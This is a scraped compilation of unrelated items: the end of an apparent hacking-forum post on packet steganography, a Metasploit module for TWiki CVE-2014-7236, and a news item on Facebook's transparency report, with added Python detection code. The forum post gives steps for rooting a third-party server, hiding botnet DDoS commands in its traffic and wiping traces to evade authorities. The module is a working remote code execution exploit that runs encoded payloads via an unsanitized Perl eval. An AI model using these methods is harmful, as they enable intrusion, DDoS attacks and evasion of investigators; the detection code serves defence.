            t.schedule( new TimerTask(){public void run(){} }, num);
            // no this isn't a legit method, you'd want to use outside resources for this part
            //but at least the method dies in the two minute timeframe
            XClass.storeAllPackets();
        }

        public void sortThrough(PacketList p, Method a){
            int x=p.length();
            for(int i=0; i<p.length(); i++){
                if(!a.follows(p.get(i))){
                    p.rem(i);
                    i--;
                }
            }
            //after that method runs, the only packets left should be from you
            //obviously it is theoretically possible someone else did the exact same as you, so you'd then check them
            for(int i=0; i<p.length(); i++){
                if(!a.check(p.get(i))){
                    p.rem(i);
                    i--;
                }
            }
            //now all that's left is the correct one
        }

        public void finishUP(){
            if(p.length()>0){
                //translates the info packet from the correct IP if an ip was gathered
                translate(XClass.nextPacketFrom(p.get1IP()), a);
                //runs whatever it got
                run();
            }
            //wipes all data that was stored, logs in database
            StartClass.wipe();
        }
    }

Rough Example in Real Life Application

Packet steganography can also be used for sending out instructions to a botnet since you don't really need to send that much information to tell x to DDOS y, now do you? Here's a rough guide of how you'd communicate through your bots to start a DDOS attack w/ packet steganography, from the setting up the server to the attacking the kid who beat you in MW3

1) Find a good server that has a decent amount of traffic, but nothing too sketchy.
2) Get root access on this server.
3) Download wireshark if you don't already have it.
4a) Write your program to test the wireshark logs to find a pattern in packet anomalies (you figure this one out on your own).
4b) Write the program that can send out edited packets from your machine.
5) Set up another program that connects the wireshark program with your botnet server.
6) Set up a last program that wipes your traces of you fucking off with the server.
7) Run 6 and leave the shell you set up if you want (I suggest keeping some part of it intact though, depends on what you want to do).
8) Set up a couple more of these steno servers.
9) Realize that you can now send instructions easily but make it look like its a normal connection.

Want to ddos server agh554? Connect with one of those servers and send the right kind of packets for a little while. Next thing you know your DDOS servers will be connecting with each other to get the details down and start the attack at the time specified.
Because of the way the information is transferred from you to the server it'll be hard to trace the botnet back to you and then convict you as the one who pulled the strings behind a DDOS of a n00b MW3 player. I know that a couple people already do this, but now you know how too.

Ending Thoughts (Read it though)

So why the hell does this matter?

A) all the data will look legitimate you can send it from different sources and it doesn't really matter as long as the packets are getting screwed correctly
C) You think it's easy to look through every single packet sent to a server that gets a lot of traffic for the past 4ish months and then find the packets that link with the pattern?
D) can be used for stuff other than botnets
   i) You can send encryption keys through this and then wipe the programs you installed.
   ii) anonymous communication
E) MITM attacks don't matter unless the MITM got your src (look at number 4)

Problems with this?

1) Server gets taken by the feds. They won't be too happy about this
2) A wingding manages to replicate the correct stream, and then gives out commands for your server. This is something you'll just have to accept. Anonymity is what we are going for, too many traces = too many chances of someone finding a link
3) No well known VPNs allow packet modification at the moment.
4) if the feds got your SRC since you and 800 other skids are using the same program, and they catch you are modding packets, you're kinda screwed if they catch you redhanded
5) "I don't get it"

Solutions to the problems

1) If modded packets are the only connections between your bots and your servers, it's a lot harder to trace since the server has a massive amount of people using it
2) Nothing really, make it so it can't easily be replicated
3) wait for it [breathing intensifies]
4) Don't be a skid
5) See above. Or, read the links at the bottom of the page, learn something interesting, and prove to me that there are users with brains here

Credits: TF
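For defenders reading the post above: its pseudocode writes the loop counter twice at hex offsets 12-13 of ten consecutive messages, and a per-source sequence check on captured traffic picks that up. The Python below is an added example, not part of the original post; the packet strings, the addresses (documentation range 192.0.2.0/24) and the run threshold are constructed assumptions.

```python
from collections import defaultdict

MARK_AT = 12                      # hex-string offset the post's pseudocode overwrites
HEX_DIGITS = "0123456789abcdef"


def marker(packet_hex):
    """Return n when hex chars 12-13 are the same digit n (the post's
    pseudocode writes the loop counter there twice), otherwise None."""
    pair = packet_hex[MARK_AT:MARK_AT + 2].lower()
    if len(pair) == 2 and pair[0] == pair[1] and pair[0] in HEX_DIGITS:
        return int(pair[0], 16)
    return None


def longest_counter_run(packets):
    """Length of the longest run of consecutive packets whose marker
    increases by exactly one from packet to packet."""
    best = run = 0
    prev = None
    for pkt in packets:
        m = marker(pkt)
        if m is not None and prev is not None and m == prev + 1:
            run += 1
        elif m is not None:
            run = 1               # a lone doubled digit also occurs in normal chat
        else:
            run = 0
        best = max(best, run)
        prev = m
    return best


def flag_sources(capture, min_run=5):
    """capture: iterable of (source_ip, packet_hex) in arrival order.
    Returns the sources whose traffic contains a counter run >= min_run."""
    by_src = defaultdict(list)
    for src, pkt in capture:
        by_src[src].append(pkt)
    return sorted(src for src, pkts in by_src.items()
                  if longest_counter_run(pkts) >= min_run)


def constructed_capture():
    """Constructed sample: one source marks ten messages 00, 11, ... 99,
    the other sends ordinary chat payloads behind the same 12-char header."""
    base = "3a00bb0c1f0048656c6c6f20746865726521"
    chat = ["3a00bb0c1f0048656c6c6f", "3a00bb0c1f00666f6f",
            "3a00bb0c1f006c6f6c", "3a00bb0c1f0062726221"]
    capture = []
    for i in range(10):
        capture.append(("192.0.2.10", base[:12] + format(i, "x") * 2 + base[14:]))
        capture.append(("192.0.2.20", chat[i % len(chat)]))
    return capture


CAPTURE = constructed_capture()

if __name__ == "__main__":
    print("flagged sources:", flag_sources(CAPTURE))
```
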
  24.

    ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpClient

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'TWiki Debugenableplugins Remote Code Execution',
          'Description'    => %q{
            TWiki 4.0.x-6.0.0 contains a vulnerability in the Debug functionality.
            The value of the debugenableplugins parameter is used without proper sanitization
            in an Perl eval statement which allows remote code execution
          },
          'Author'         =>
            [
              'Netanel Rubin', # from Check Point - Discovery
              'h0ng10',        # Metasploit Module
            ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              [ 'CVE', '2014-7236'],
              [ 'OSVDB', '112977'],
              [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236']
            ],
          'Privileged'     => false,
          'Targets'        =>
            [
              [ 'Automatic',
                {
                  'Payload'  =>
                    {
                      'BadChars' => "",
                      'Compat'   =>
                        {
                          'PayloadType' => 'cmd',
                          'RequiredCmd' => 'generic perl python php',
                        }
                    },
                  'Platform' => ['unix'],
                  'Arch'     => ARCH_CMD
                }
              ]
            ],
          'DefaultTarget'  => 0,
          'DisclosureDate' => 'Oct 09 2014'))

        register_options(
          [
            OptString.new('TARGETURI', [ true, "TWiki path", '/do/view/Main/WebHome' ]),
            OptString.new('PLUGIN', [true, "A existing TWiki Plugin", 'BackupRestorePlugin'])
          ], self.class)
      end

      def send_code(perl_code)
        uri = target_uri.path
        data = "debugenableplugins=#{datastore['PLUGIN']}%3b" + CGI.escape(perl_code) + "%3bexit"

        res = send_request_cgi!({
          'method' => 'POST',
          'uri'    => uri,
          'data'   => data
        })

        return res
      end

      def check
        rand_1 = rand_text_alpha(5)
        rand_2 = rand_text_alpha(5)

        code = "print(\"Content-Type:text/html\\r\\n\\r\\n#{rand_1}\".\"#{rand_2}\")"
        res = send_code(code)

        if res and res.code == 200
          return CheckCode::Vulnerable if res.body == rand_1 + rand_2
        end
        CheckCode::Unknown
      end

      def exploit
        code = "print(\"Content-Type:text/html\\r\\n\\r\\n\");"
        code += "require('MIME/Base64.pm');MIME::Base64->import();"
        code += "system(decode_base64('#{Rex::Text.encode_base64(payload.encoded)}'));exit"
        res = send_code(code)
        handler
      end
    end

Source
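Because the module's description says the debugenableplugins value reaches a Perl eval unsanitized, a request filter or log review can treat any value that is not a plain list of plugin names as hostile. The Python below is an added example, not TWiki's fix or part of the module; the allow-list pattern, the request records and the client addresses are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

PARAM = "debugenableplugins"

# Assumption: a legitimate value is empty or a comma-separated list of plugin
# names made of letters, digits and underscores, e.g. "BackupRestorePlugin".
SAFE_VALUE = re.compile(r"\A(?:[A-Za-z0-9_]+(?:,\s*[A-Za-z0-9_]+)*)?\Z")


def suspicious_values(url, body=""):
    """Return every debugenableplugins value, taken from the query string or
    a form-encoded body, that is not a plain list of plugin names.
    Values are percent-decoded first, so an encoded ';' (%3b) is seen as ';'."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    pairs += parse_qsl(body, keep_blank_values=True)
    return [value for name, value in pairs
            if name == PARAM and not SAFE_VALUE.match(value)]


def scan(requests):
    """requests: iterable of dicts with 'client', 'url' and 'body' keys.
    Returns (client, offending_value) for each request that should be
    blocked or investigated."""
    hits = []
    for req in requests:
        for value in suspicious_values(req["url"], req.get("body", "")):
            hits.append((req["client"], value))
    return hits


# Constructed sample requests. The third one has the shape the module sends:
# plugin name, an encoded ';', code, an encoded ';', then "exit".
REQUESTS = [
    {"client": "192.0.2.7", "url": "/do/view/Main/WebHome", "body": ""},
    {"client": "192.0.2.8",
     "url": "/do/view/Main/WebHome?debugenableplugins=TablePlugin,SpreadSheetPlugin",
     "body": ""},
    {"client": "192.0.2.44", "url": "/do/view/Main/WebHome",
     "body": "debugenableplugins=BackupRestorePlugin%3bprint(1)%3bexit"},
]

if __name__ == "__main__":
    for client, value in scan(REQUESTS):
        print(f"ALERT {client}: {PARAM}={value!r}")
```
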
  25. Facebook today reported a slight drop in government requests for user data, bucking a trend that peaked during the first half of 2014 with the highest numbers the company had seen. Its latest transparency report covers the second half of last year, and shows slight dips in requests for user data, the number of accounts referenced and the percentage of requests where Facebook turned over some data. The numbers are still high, however, and demonstrate a continued interest on the part of the government to use data from web-based services in criminal and national security cases. Despite dips in requests in the United States—and Germany—Facebook said overall requests for user account data were up slightly from its last report, as was the number of government requests for data and content restrictions. In the U.S., for example, Facebook received 14,274 requests for user data affecting 21,731 accounts; Facebook said it complied with 79 percent of those requests, turning over some content or user data. Content restriction requests, meanwhile, were almost exclusively dominated by India and Ukraine. By comparison, Facebook, through the first six months of 2014, fielded 15,433 requests for user data affecting 23,667 accounts; in 80 percent of those occasions, Facebook turned over some data. “We publish this information because we want people to know the extent and nature of the requests we receive from governments and the policies we have in place to process them,” said Monika Bickert, head of Facebook global policy management, and Chris Sonderby, Deputy General Counsel. “Moving forward, we will continue to scrutinize each government request and push back when we find deficiencies.
We will also continue to push governments around the world to reform their surveillance practices in a way that maintains the safety and security of their people while ensuring their rights and freedoms are protected.” Facebook also provided some insight into its Community Standards, which define what is acceptable content that is allowed to be posted on the social network. Bickert and Sonderby said there are occasions, for example, when Facebook is asked to remove or restrict access to content because it violates local law, even though it may be within the bounds of its standards. Those numbers are also included in today’s report, along with more detail and examples of what constitutes Facebook’s Community Standards. “We challenge requests that appear to be unreasonable or overbroad,” Bickert and Sonderby said. “And if a country requests that we remove content because it is illegal in that country, we will not necessarily remove it from Facebook entirely, but may restrict access to it in the country where it is illegal.” Source